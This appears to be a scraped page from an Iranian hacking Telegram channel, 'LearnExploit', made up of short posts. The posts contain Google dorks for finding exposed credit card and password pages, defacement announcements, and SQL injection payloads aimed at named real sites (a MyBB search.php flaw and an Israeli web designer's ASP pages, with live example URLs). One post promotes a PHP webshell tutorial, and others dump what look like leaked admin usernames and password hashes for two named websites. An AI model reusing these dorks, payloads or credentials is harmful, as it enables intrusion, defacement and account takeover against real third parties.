0Day.Today | Learn Exploit | Zero World | Dark web |
19K subscribers
1.23K photos
125 videos
489 files
1.28K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
#Exploiting - #HTMLInjection(GET) - #Bug
اموزش باگ HTMLInjection و اکسپلویت کردن ان توسط JAVASCRIPT
dl link : yon.ir/nuTUy
T.me/LearnExploit
👍1
Forwarded from عکس نگار
#Exploiting - #HTMLInjection(Post) - #Bug
———-
در این اموزش یاد میگیرید که چطور با استفاده از باگ HTML Injection - Reflected (POST) صفحه ی دیفیس خودتون رو در سایت ظاهر کنید.
Part 1 : t.me/LearnExploit/317
dl link : yon.ir/aBK4n
———-
T.me/LearnExploit
Forwarded from Deleted Account
#python #Armia_Evil
قسمت پنجم اموزش پایتون

@LearnExploit
Forwarded from Deleted Account
Media is too big
VIEW IN TELEGRAM
#python #Armia_Evil
قسمت پنجم اموزش پایتون

@LearnExploit
اموزش نوشتن `Command Execute WebShell`ساده با php
#Command #Execute #WebShell
—-
@LearnExploit
هرچی شکارچی گرسنه تر باشه هدفش برای شکار کوچیکتره. بقا انگیزست، هدف نیست.

بدون کار رو کی و چطور شروع میکنی و کی و چطور تموم میکنی. قطع کردن ناگهانی یک فرایند اشتباه بزرگیه مثل خوابوندن بچه با باتوم به جای لالایی، یا بدتر قطع کردن برق کامپیوتر به جای خاموش کردنش.

#انگیزشی

🆔 @LearnExploit
#DeFaced By #X0P4SH4
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://mirror-h.org/zone/1695439/

@LearnExploit
#DeFaced By #X0P4SH4
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://mirror-h.org/zone/1695437/

@LearnExploit
Forwarded from اتچ بات
#New #Priv8 #Dork (2018)
[+] #Credit Card
[+] #Paypal
/////////////
intext:"bri".php?id= intext:"Credit Card" site:.com
intext:"kartu kredit".php?id= intext:"Username" site:.com
intext:"bayar dengan kartu kredit".php?id= intext:"Password" site:.com
intitle:"bayar dengan kartu kredit".php?id= titleConfusedhop intext:"Credit Card" site:.com
intitle:"human".php?id= title:education intext:"Username" site:.com
intitle:"Publications".php?id= title:login intext:"Password" site:.com
intitle:"project".php?id= title:join intext:"Username" site:.com
intitle:"trade".php?id= title:orders intext:"Username" site:.com
intitle:"commodity".php?id= title:join intext:"Username" site:.com
intitle:"promotion".php?id= title:news intext:"Email+Password" site:.com
intitle:"center".php?id= title:join intext:"Credit Card" site:.com
intitle:"community".php?id= title:join intext:"Email+Password" site:.com
intitle:"marketing".php?id= title:join intext:"Credit Card" site:.com
intitle:"membership".php?id= title:info intext:"Username" site:.com
intitle:"mountaineer".php?id= title:join intext:"Credit Card" site:.com
intitle:"bike".php?id= title:payment intext:"Credit Card" site:.com
intitle:"management".php?id= title:business intext:"Username" site:.com
intitle:"insurance".php?id= title:join intext:"Credit Card" site:.com
inurl:business.php?cid= title:join intext:"Username" site:.com
intitle:"company".php?id= titleConfusedign in intext:"Email+Password" site:.com
intitle:"store".php?id= title:cart intext:"Credit Card" site:.com
intitle:"career".php?lang=en title:join intext:"Credit Card" site:.com
intitle:"jobs".php?lang=en intext:business intext:"Email+Password" site:.com
inurl:client.php?id= title:login intext:"Username" site:.com
//////////////////
T.me/LearnExploit
😁1
#DeFaced By #X0P4SH4
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://mirror-h.org/zone/1695478/

@LearnExploit
#DeFaced By #X0P4SH4
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://mirror-h.org/zone/1695477/

@LearnExploit
#DeFaced By #X0P4SH4
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://mirror-h.org/zone/1695476/

@LearnExploit
#Dork - Get user and pass of the sites...! : )
"login" intext:"password" | "passcode" filetype:txt
==================
@LearnExploit
#Exploit - #Dork - #Israel new 2018
#######################################

# Exploit Title : Designed By Studio Octavo Israel SQL Injection Vulnerability

######################################

# Google Dork : intext:''Designed By Studio Octavo'' site:il

# Exploits :

/content.asp?id=[SQL Inj]

/info.asp?id=[SQL Inj]

#######################################

# Example Site => sy-ccc.co.il/content.asp?id=9%27 => [ Proof of Concept ] => archive.is/BEuse

# SQL Database Error =>

Microsoft JET Database Engine error '80040e14'

Syntax error in string in query expression 'id = 9''.

/content.asp, line 5

#######################################

# T.me/LearnExploit - 0Day.Today Boy's

#######################################
#Exploit - #Dork - #MYBB
——————————-
[+] Exploit Name: MYBB 1.6.12 search.php Sql injection
[+] Google Dork : intext:"powered by Mybb"
[+] Version: 1.6.12
اسیب پذیری sql در MYBB 1.6.12
——————————-
|~Exploit :
بخش زیر رو به URL سایت اضافه کنید.
search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=

|~Demo :

http://community.mybb.com/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=

|~Error :

Warning [2] mysqli_real_escape_string() expects parameter 2 to be string,
array given - Line: 874 - File: inc/db_mysqli.php PHP 5.4.19

-1~dotdeb.1 (Linux)

|~Exm :

1) http://my-bb.ir/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=
2) http://community.mybb.com/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=
3) http://www.mybb.fr/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=

***************************************************

[+] How To patch :

فایل search.php رو باز کنید و قسمت زیر رو پیدا کنید:
$sid = $db->escape_string($mybb->input['sid']);

و به کد زیر تغییر دهید :
if(is_array($mybb->input['sid']))
$sid = $db->escape_string(implode($mybb->input['sid']));
else
$sid = $db->escape_string($mybb->input['sid']);
=======================================
T.me/LearnExploit
0Day.Today Boy's
Forwarded from اتچ بات
دو فایل MYBB از دو سایت هکری :)
کافیه admin رو سرچ کنید
Special Tnx to DARKDAYS
============
@LearnExploit
#Target ::: #User ::: #Pass
Target :
http://wagsrescue.org
User & Pass :
admin : A.f0Kvdiyy8q2
author : zs047RckAhJH6
guest : ZX9XTlIfPvdGE
============
@LearnExploit
#Target ::: #User ::: #Pass
Target :
http://www.lideranca.org
User & Pass :
admin : /jkfgw0oh8SPc
author : zs047RckAhJH6
guest : ZX9XTlIfPvdGE
tom : MiIT3htHGE74E
============
@LearnExploit